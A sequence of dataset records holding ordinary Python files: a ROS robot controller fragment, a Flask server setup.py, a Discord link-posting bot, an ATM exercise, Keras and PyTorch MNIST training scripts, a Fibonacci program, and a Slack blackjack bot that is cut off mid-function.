Robot_route()\n\n\tloginfo(\"Parcours : attente service moteur ...\")\n\trospy.wait_for_service(\"motor_control\")\n\tmotor_srv = rospy.ServiceProxy(\"motor_control\",MotorSrv)\n\t\n\tloginfo(\"Parcours : attente moteur ON ...\")\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown() and not robot.motor_state:\n\t\trate.sleep()\n\n#\trobot.test()\n#\trospy.spin()\n\n\tloginfo(\"Parcours : attente capteurs ON ...\")\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown() and robot.proximity[0] == 0.0:\n\t\trate.sleep()\n\ttime.sleep(1)\n\n\tloginfo(\"Parcours : initialisation du moteur\")\n\ttry:\n\t\tres = motor_srv(True,ACCELERATION,True,True)\n\t\tif res.result != 1:\n\t\t\tloginfo(\"Parcours : erreur initialisation accélération: %s\"%res)\n\t\telse:\n\t\t\trospy.on_shutdown(robot.stop)\n\t\t\trate = rospy.Rate(10)\n\t\t\twhile not rospy.is_shutdown():\n\t\t\t\tif robot.motor_state: robot.command()\n\t\t\t\trate.sleep()\n\n\texcept rospy.ServiceException as exc:\n\t\tloginfo(\"Parcours : Erreur service moteur: %s\"%exc)\n\n\n\n\n\n\n","sub_path":"decawave_driver/ubo_pkg/scripts/robot_route.py","file_name":"robot_route.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"316164132","text":"import setuptools\nimport os\nimport shutil\n\n\nsetuptools.setup(\n name=\"Original Sin'S Server\",\n version=\"2.0.1\",\n author=\"NutShellBox\",\n author_email=\"nutshellbox.public@gmail.com\",\n description=\"Original Sin's Server Script\",\n url=\"https://www.arheneos.com\",\n packages=setuptools.find_packages(),\n install_requires=[\n \"Flask>=1.0.2, <2\",\n \"pymongo>=3.6.0\",\n \"imageio>=2.3.0\",\n \"scipy>=1.1.0\",\n \"markdown2==2.3.5\",\n \"gevent>=1.3.0\",\n \"bs4>=0.0.1\",\n \"psutil>=5.4.0\",\n \"Flask-Login==0.4.1\",\n ],\n scripts=['sin_server.py']\n)\n\nprint(\"Installing Datafiles ... \")\nstatic_folder_items = [\"templates\", \"img\", \"js\", \"css\", \"webfonts\"]\nif not os.path.exists(\"/media/\"):\n os.mkdir(\"/media\")\n\nfor r in static_folder_items:\n if os.path.exists(\"/media/{}\".format(r)):\n shutil.rmtree(\"/media/{}\".format(r))\n shutil.copytree(r, \"/media/{}\".format(r))\n print(f\"{os.getcwd() + '/'} -> {'/media/'}\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221742964","text":"import discord\nimport config\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\n\nclass Links(Cog):\n \"\"\"\n Commands for easily linking to projects.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(hidden=True)\n async def pegaswitch(self, ctx):\n \"\"\"Link to the Pegaswitch repo\"\"\"\n await ctx.send(\"https://github.com/reswitched/pegaswitch\")\n\n @commands.command(hidden=True, aliases=[\"atmos\"])\n async def atmosphere(self, ctx):\n \"\"\"Link to the Atmosphere repo\"\"\"\n await ctx.send(\"https://github.com/atmosphere-nx/atmosphere\")\n\n @commands.command(hidden=True, aliases=[\"xyproblem\"])\n async def xy(self, ctx):\n \"\"\"Link to the \"What is the XY problem?\" post from SE\"\"\"\n await ctx.send(\"\\n\\n\"\n \"TL;DR: It's asking about your attempted solution \"\n \"rather than your actual problem.\\n\"\n \"It's perfectly okay to want to learn about a \"\n \"solution, but please be clear about your intentions \"\n \"if you're not actually trying to solve a problem.\")\n\n @commands.command(hidden=True, aliases=[\"guides\", \"link\"])\n async def guide(self, ctx):\n \"\"\"Link to the guide(s)\"\"\"\n\n message_text=(\"**Generic starter guides:**\\n\"\n \"AtlasNX's Guide: \"\n \"\\n\"\n \"\\n\"\n \"**Specific guides:**\\n\"\n \"Manually Updating/Downgrading (with HOS): \"\n \"\\n\"\n \"Manually Repairing/Downgrading (without HOS): \"\n \"\\n\"\n \"Setting up EmuMMC (Windows): \"\n \"\\n\"\n \"Setting up EmuMMC (Linux): \"\n \"\\n\"\n \"Setting up EmuMMC (Mac): \"\n \"\\n\"\n \"How to get started developing Homebrew: \"\n \"\\n\"\n \"\\n\")\n\n try:\n support_faq_channel = self.bot.get_channel(config.support_faq_channel)\n if support_faq_channel is None:\n message_text += \"Check out #support-faq for additional help.\"\n else:\n message_text += f\"Check out {support_faq_channel.mention} for additional help.\"\n except AttributeError:\n message_text += \"Check out #support-faq for additional help.\"\n \n await ctx.send(message_text)\n\n @commands.command(hidden=True, aliases=[\"patron\"])\n async def patreon(self, ctx):\n \"\"\"Link to the patreon\"\"\"\n await ctx.send(\"https://patreon.teamatlasnx.com\")\n\n @commands.command(hidden=True, aliases=[\"coffee\"])\n async def kofi(self, ctx):\n \"\"\"Link to Ko-fi\"\"\"\n await ctx.send(\"https://kofi.teamatlasnx.com\")\n\n @commands.command(hidden=True, aliases=[\"sdfiles\"])\n async def kosmos(self, ctx):\n \"\"\"Link to the latest Kosmos release\"\"\"\n await ctx.send(\"https://github.com/AtlasNX/Kosmos/releases/latest\")\n\n @commands.command(hidden=True, aliases=[\"sd\"])\n async def sdsetup(self, ctx):\n \"\"\"Link to SD Setup\"\"\"\n await ctx.send(\"https://sdsetup.com\")\n\n @commands.command()\n async def source(self, ctx):\n \"\"\"Gives link to source code.\"\"\"\n await ctx.send(f\"You can find my source at {config.source_url}. \"\n \"Serious PRs and issues welcome!\")\n\ndef setup(bot):\n bot.add_cog(Links(bot))\n","sub_path":"cogs/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290968424","text":"#liuhao\n'''\n主逻辑交互程序\n'''\nimport os,sys\nBASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nfrom core import transaction\nfrom core.auth import *\n@auth\ndef welcome():\n print('welcome to bank')\ndef run():\n account_id=welcome()\n dic={\n '1':transaction.withdrawals,\n '2':transaction.refund,\n '3':transaction.transfer,\n '4':transaction.query\n }\n while True:\n print('''\n 1. 取现\n 2. 还款\n 3. 转账\n 4. 查询\n 退出【任意键】\n ''')\n choice=input(\">>\").strip()\n if choice in dic:\n dic[choice](account_id)\n else:\n return\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"day4/atm+购物商城作业/ATM/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"482755184","text":"# coding: utf-8\n\n# import the necessary packages\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.image import img_to_array\nfrom keras.utils import to_categorical\nfrom imutils import paths\nimport matplotlib.pyplot as plt\n# import matplotlib\n# matplotlib.use(\"Agg\")\n# import numpy as np\n# import argparse\nimport random\nimport cv2\nimport os\nimport keras\nimport sys\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras import regularizers\nimport scipy.io as scio\n\n# coding=utf-8\nfrom keras.models import Model\nfrom keras.layers import Input, Dense, BatchNormalization, Conv2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D,LSTM, CuDNNLSTM\nfrom keras.layers import add, Flatten\n# from keras.layers.convolutional import Conv2D,MaxPooling2D,AveragePooling2D\nfrom keras.optimizers import SGD\nimport numpy as np\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.callbacks import TensorBoard\nfrom keras import backend as K\nfrom keras.layers import Conv2D,MaxPool2D\nfrom keras.regularizers import l2\n\nclass MODEL:\n def Vgg(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n model = Sequential(name='vgg16-sequential')\n input_shape=(width,height,depth)\n # 第1个卷积区块(block1)\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu', input_shape=input_shape, name='block1_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu', name='block1_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block1_pool'))\n\n # 第2个卷积区块(block2)\n model.add(Conv2D(128, (3, 3), padding='same', activation='relu', name='block2_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(128, (3, 3), padding='same', activation='relu', name='block2_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block2_pool'))\n\n # 第3个区块(block3)\n model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(256, (3, 3), padding='same', activation='relu', name='block3_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block3_pool'))\n\n # 第4个区块(block4)\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block4_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block4_pool'))\n\n # 第5个区块(block5)\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv1',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv2',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Conv2D(512, (3, 3), padding='same', activation='relu', name='block5_conv3',kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(MaxPool2D((2, 2), strides=(2, 2), name='block5_pool'))\n\n\n # 前馈全连接区块\n model.add(Flatten(name='flatten'))\n model.add(Dense(4096, activation='relu', name='fc1'))\n model.add(Dense(4096, activation='relu', name='fc2'))\n model.add(Dense(classNum, activation='softmax', name='predictions'))\n\n return model\n\n def Lenet(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n # 初始化模型\n model = Sequential()\n inputShape = (height, width, depth)\n # if we are using \"channels last\", update the input shape\n if K.image_data_format() == \"channels_first\": #for tensorflow\n inputShape = (depth, height, width)\n # 第一段\n model.add(Conv2D(20, (3, 3),padding=\"same\",input_shape=inputShape,kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(20, (3,3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(20, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n # model.add(AveragePooling2D(pool_size=(2, 2), strides=(2, 2)))\n # 第二段\n model.add(Conv2D(50, (3, 3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(50, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(50, (3, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(3, 3)))\n\n\n model.add(Conv2D(50, (1, 3), padding=\"same\",kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(50, (1, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(Conv2D(50, (1, 3), padding=\"same\", kernel_regularizer=regularizers.l2(weight_decay)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(3, 3)))\n # model.add(AveragePooling2D(pool_size=(2, 2), strides=(2, 2)))\n # 第三段\n model.add(Flatten())\n model.add(Dense(100))\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.9))\n\n # softmax 分类器\n model.add(Dense(classNum))\n model.add(Activation(\"sigmoid\"))\n\n # 返回构造的模型\n return model\n def LSTM(height=64,width=64,depth=3,weight_decay=0.0005,classNum=0):\n model = Sequential()\n # model.add(LSTM(128, input_shape = (height, width)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\"\n ,input_shape = (height, width, depth)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n model.add(Conv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n model.add(Conv2D(filters=4, kernel_size=(3, 3), padding=\"same\", activation=\"relu\",kernel_regularizer=regularizers.l1(weight_decay)))\n model.add(BatchNormalization())\n # model.add(MaxPooling2D(pool_size=(3, 3)))\n\n model.add(Flatten())\n\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dropout(0.5))\n model.add(BatchNormalization())\n # model.add(Dropout(0.2))\n model.add(Dense(classNum, activation=\"sigmoid\"))\n return model\n # adam = Adam(lr=0.001)\n # model.compile(optimizer=adam, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n # model.summary()\n\ndef load_data(path):\n print(path)\n labels_list=os.listdir(path);\n labels_list.sort();\n print(\"[INFO] loading images...\")\n data = []\n labels = []\n # grab the image paths and randomly shuffle them\n imagePaths = sorted(list(paths.list_images(path)))\n # print(imagePaths)\n # dda\n random.seed(42)\n random.shuffle(imagePaths)\n # loop over the input images\n for imagePath in imagePaths:\n # load the image, pre-process it, and store it in the data list\n # print(imagePath)\n image = cv2.imread(imagePath)\n image = cv2.resize(image, (norm_size, norm_size))\n image = img_to_array(image)\n data.append(image)\n\n # extract the class label from the image path and update the\n # labels list\n # print(imagePath.split(os.path.sep)[-2])\n label = labels_list.index(imagePath.split(os.path.sep)[-2])\n labels.append(label)\n\n # scale the raw pixel intensities to the range [0, 1]\n data = np.array(data, dtype=\"float\") / 255.0\n labels = np.array(labels)\n\n # convert the labels from integers to vectors\n labels = to_categorical(labels, num_classes=CLASS_NUM)\n return data, labels\n\ndef load_matData(path):\n labels_list = os.listdir(path);\n labels_list.sort();\n print(\"[INFO] loading images...\")\n data = []\n labels = []\n\n imagePaths = sorted(list(paths.list_files(path)))\n random.seed(0)\n random.shuffle(imagePaths)\n\n # loop over the input images\n for imagePath in imagePaths:\n # load the image, pre-process it, and store it in the data list\n # print(imagePath)\n image=scio.loadmat(imagePath)\n keys=list(image.keys())\n # print(type(image[keys[3]]))\n image=image[keys[3]]\n image=image.reshape(image.shape+(1,))\n data.append(image)\n\n\n # extract the class label from the image path and update the\n # labels list\n label = labels_list.index(imagePath.split(os.path.sep)[-2])\n labels.append(label)\n # print(labels)\n\n # scale the raw pixel intensities to the range [0, 1]\n data = np.array(data, dtype=\"float\")\n data=(data-np.mean(data))/np.std(data)\n labels = np.array(labels)\n\n # convert the labels from integers to vectors\n labels = to_categorical(labels, num_classes=CLASS_NUM)\n return data, labels\n\n\n\n\n\ndef train(aug, trainX, trainY, testX, testY):\n #CLASS_NUM\n # initialize the model\n print(\"[INFO] compiling model...\")\n # model = MODEL.Vgg(norm_size,norm_size,depth,0.0005,classNum=CLASS_NUM)\n model = MODEL.LSTM(61, 700, depth, 0, classNum=CLASS_NUM)\n model.summary()\n # model= keras.models.load_model('ResNet50.hdf5')\n adam = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\n # sgd = SGD(decay=0.0001, momentum=0.9)\n # model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n model.compile(loss=\"categorical_crossentropy\", optimizer=adam, metrics=[\"accuracy\"])\n\n # train the network\n print(\"[INFO] training network...\")\n model_checkpoint = ModelCheckpoint('Vgg.hdf5', monitor='val_acc', verbose=1, save_best_only=True)\n tb_cb = keras.callbacks.TensorBoard(log_dir=\"./log\", write_images=1, histogram_freq=0)\n # 设置log的存储位置,将网络权值以图片格式保持在tensorboard中显示,设置每一个周期计算一次网络的\n # 权值,每层输出值的分布直方图\n H = model.fit_generator(aug.flow(trainX, trainY, batch_size=BS),callbacks=[model_checkpoint,tb_cb],\n validation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n epochs=EPOCHS)\n # H=model.fit(trainX, trainY,batch_size=BS,callbacks=[model_checkpoint,tb_cb],\n # validation_data=(testX, testY),\n # epochs=EPOCHS)\n # save the model to disk\n print(\"[INFO] serializing network...\")\n model.save(\".//lasted.model\")\n\n # plot the training loss and accuracy\n plt.style.use(\"ggplot\")\n plt.figure()\n N = EPOCHS\n plt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\n plt.plot(np.arange(0, N), H.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\n plt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy on foot classifier\")\n plt.xlabel(\"Epoch #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc=\"lower left\")\n plt.savefig(\"train.png\")\n\n\nCLASS_NUM=0\nEPOCHS = 500\nINIT_LR = 1e-4\nBS = 16\n# norm_size = 128\ndepth=1\n\nif __name__ == '__main__':\n train_file_path = \"D:\\data\\\\naodian\\classes4\";\n # test_file_path = \"./val\"\n CLASS_NUM = len(os.listdir(train_file_path))\n # print(CLASS_NUM)\n allX, allY = load_matData(train_file_path)\n rate=int(len(allX)*0.7)\n\n trainX, trainY=allX[:rate,:,:],allY[:rate,:]\n testX, testY = allX[rate:, :, :], allY[rate:, :]\n\n\n # testX, testY = load_data(test_file_path)\n # construct the image generator for data augmentation\n\n aug = ImageDataGenerator()\n print(trainX.shape)\n train(aug, trainX, trainY, testX, testY)\n\n\n\n\n\n\n","sub_path":"python/20190808/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250287984","text":"def fib(i):\n if i < 0:\n print(\"invalid input\")\n elif i == 0:\n return 0\n elif i == 1:\n return 1\n else:\n return fib(i-1)+fib(i-2)\n\n\nn = int(input(\"enter no of elements\"))\nfor i in range(n+1):\n print(fib(i))\n","sub_path":"fibonaccirecurtion.py","file_name":"fibonaccirecurtion.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372354989","text":"import argparse\nimport json\nimport logging\nimport os\nimport sys\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nfrom torchvision import datasets, transforms\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\n\nclass Net(nn.Module):\n # Based on https://github.com/pytorch/examples/blob/master/mnist/main.py\n def __init__(self):\n logger.info(\"Create neural network module\")\n\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, training=self.training)\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n\n\ndef _get_train_data_loader(training_dir, is_distributed, batch_size, **kwargs):\n logger.info(\"Get train data loader\")\n dataset = datasets.MNIST(\n training_dir,\n train=True,\n transform=transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]\n ),\n download=False, # True sets a dependency on an external site for our canaries.\n )\n train_sampler = (\n torch.utils.data.distributed.DistributedSampler(dataset) if is_distributed else None\n )\n train_loader = torch.utils.data.DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=train_sampler is None,\n sampler=train_sampler,\n **kwargs\n )\n return train_sampler, train_loader\n\n\ndef _get_test_data_loader(training_dir, **kwargs):\n logger.info(\"Get test data loader\")\n return torch.utils.data.DataLoader(\n datasets.MNIST(\n training_dir,\n train=False,\n transform=transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]\n ),\n download=False, # True sets a dependency on an external site for our canaries.\n ),\n batch_size=1000,\n shuffle=True,\n **kwargs\n )\n\n\ndef _average_gradients(model):\n # Gradient averaging.\n size = float(dist.get_world_size())\n for param in model.parameters():\n dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)\n param.grad.data /= size\n\n\ndef train(args):\n world_size = len(args.hosts)\n is_distributed = world_size > 1\n logger.debug(\"Number of hosts {}. Distributed training - {}\".format(world_size, is_distributed))\n use_cuda = args.num_gpus > 0\n logger.debug(\"Number of gpus available - {}\".format(args.num_gpus))\n kwargs = {\"num_workers\": 1, \"pin_memory\": True} if use_cuda else {}\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n if is_distributed:\n # Initialize the distributed environment.\n backend = \"gloo\"\n os.environ[\"WORLD_SIZE\"] = str(world_size)\n host_rank = args.hosts.index(args.current_host)\n dist.init_process_group(backend=backend, rank=host_rank, world_size=world_size)\n logger.info(\n \"Initialized the distributed environment: '{}' backend on {} nodes. \".format(\n backend, dist.get_world_size()\n )\n + \"Current host rank is {}. Is cuda available: {}. Number of gpus: {}\".format(\n dist.get_rank(), torch.cuda.is_available(), args.num_gpus\n )\n )\n\n # set the seed for generating random numbers\n seed = 1\n torch.manual_seed(seed)\n if use_cuda:\n torch.cuda.manual_seed(seed)\n\n train_sampler, train_loader = _get_train_data_loader(\n args.data_dir, is_distributed, args.batch_size, **kwargs\n )\n test_loader = _get_test_data_loader(args.data_dir, **kwargs)\n\n logger.debug(\n \"Processes {}/{} ({:.0f}%) of train data\".format(\n len(train_loader.sampler),\n len(train_loader.dataset),\n 100.0 * len(train_loader.sampler) / len(train_loader.dataset),\n )\n )\n\n logger.debug(\n \"Processes {}/{} ({:.0f}%) of test data\".format(\n len(test_loader.sampler),\n len(test_loader.dataset),\n 100.0 * len(test_loader.sampler) / len(test_loader.dataset),\n )\n )\n\n model = Net().to(device)\n if is_distributed and use_cuda:\n # multi-machine multi-gpu case\n logger.debug(\"Multi-machine multi-gpu: using DistributedDataParallel.\")\n model = torch.nn.parallel.DistributedDataParallel(model)\n elif use_cuda:\n # single-machine multi-gpu case\n logger.debug(\"Single-machine multi-gpu: using DataParallel().cuda().\")\n model = torch.nn.DataParallel(model)\n else:\n # single-machine or multi-machine cpu case\n logger.debug(\"Single-machine/multi-machine cpu: using DataParallel.\")\n model = torch.nn.DataParallel(model)\n\n optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.5)\n\n log_interval = 100\n for epoch in range(1, args.epochs + 1):\n if is_distributed:\n train_sampler.set_epoch(epoch)\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader, 1):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n if is_distributed and not use_cuda:\n # average gradients manually for multi-machine cpu case only\n _average_gradients(model)\n optimizer.step()\n if batch_idx % log_interval == 0:\n logger.debug(\n \"Train Epoch: {} [{}/{} ({:.0f}%)] Loss: {:.6f}\".format(\n epoch,\n batch_idx * len(data),\n len(train_loader.sampler),\n 100.0 * batch_idx / len(train_loader),\n loss.item(),\n )\n )\n accuracy = test(model, test_loader, device)\n save_model(model, args.model_dir)\n\n logger.debug(\"Overall test accuracy: {};\".format(accuracy))\n\n\ndef test(model, test_loader, device):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, size_average=False).item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n accuracy = 100.0 * correct / len(test_loader.dataset)\n\n logger.debug(\n \"Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n\".format(\n test_loss, correct, len(test_loader.dataset), accuracy\n )\n )\n\n return accuracy\n\n\ndef model_fn(model_dir):\n model = torch.nn.DataParallel(Net())\n with open(os.path.join(model_dir, \"model.pth\"), \"rb\") as f:\n model.load_state_dict(torch.load(f))\n return model\n\n\ndef save_model(model, model_dir):\n logger.info(\"Saving the model.\")\n path = os.path.join(model_dir, \"model.pth\")\n # recommended way from http://pytorch.org/docs/master/notes/serialization.html\n torch.save(model.state_dict(), path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epochs\", type=int, default=1, metavar=\"N\")\n parser.add_argument(\"--batch-size\", type=int, default=64, metavar=\"N\")\n\n # Container environment\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\n parser.add_argument(\"--model-dir\", type=str, default=os.environ[\"SM_MODEL_DIR\"])\n parser.add_argument(\"--data-dir\", type=str, default=os.environ[\"SM_CHANNEL_TRAINING\"])\n parser.add_argument(\"--num-gpus\", type=int, default=os.environ[\"SM_NUM_GPUS\"])\n parser.add_argument(\"--num-cpus\", type=int, default=os.environ[\"SM_NUM_CPUS\"])\n\n train(parser.parse_args())\n","sub_path":"tests/data/pytorch_mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95255377","text":"import os\nimport time\nimport re\nfrom slackclient import SlackClient\nimport logging\nfrom dotenv import load_dotenv\n\n# load .env variables\nload_dotenv()\n\n# sets default logging\nlogging.basicConfig()\n\n# instantiate Slack client\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n# starterbot's user ID in Slack: value is assigned after the bot starts up\nstarterbot_id = None\n\n# constants\nRTM_READ_DELAY = 0.5 # 1 second delay between reading from RTM\nEXAMPLE_COMMAND = \"do\"\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nglobal_var = {\n \"hello\": 0\n}\n\n\ndef parse_bot_commands(slack_events):\n \"\"\"\n Parses a list of events coming from the Slack RTM API to find bot commands.\n If a bot command is found, this function returns a tuple of\n command and channel.\n If its not found, then this function returns None, None.\n \"\"\"\n for event in slack_events:\n if event[\"type\"] == \"message\" and \"subtype\" not in event:\n if event[\"text\"] == \"register\":\n user_id = event[\"user\"]\n # check if global_var contains the user\n if user_id in global_var:\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You are already registered\"\n )\n # register the user\n else:\n global_var[user_id] = {\n \"money\": 100,\n }\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"OK. I registered you.\"\n )\n elif event[\"text\"] == \"play\":\n user_id = event[\"user\"]\n if user_id not in global_var:\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You are not registered\"\n )\n else:\n global_var[user_id][\"money\"] -= 10\n\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"A :spades: J :heart: BlackJack! You Win!\"\n )\n global_var[user_id][\"money\"] += 20\n\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"You now have %s dollars\" % global_var[user_id][\"money\"]\n )\n elif event[\"text\"] == \"test me\":\n global_var[\"hello\"] = global_var[\"hello\"] + 1\n slack_client.api_call(\n \"chat.postMessage\",\n channel=event[\"channel\"],\n text=\"test % s\" % global_var[\"hello\"]\n )\n\n user_id, message = parse_direct_mention(event[\"text\"])\n if user_id == starterbot_id:\n return message, event[\"channel\"]\n return None, None\n\n\ndef parse_direct_mention(message_text):\n \"\"\"\n Finds a direct mention (a mention that is at the beginning) in message text\n and returns the user ID which was mentioned. If there is no direct mention\n returns None\n \"\"\"\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, \n # the second group contains the remaining message\n return (matches.group(1), 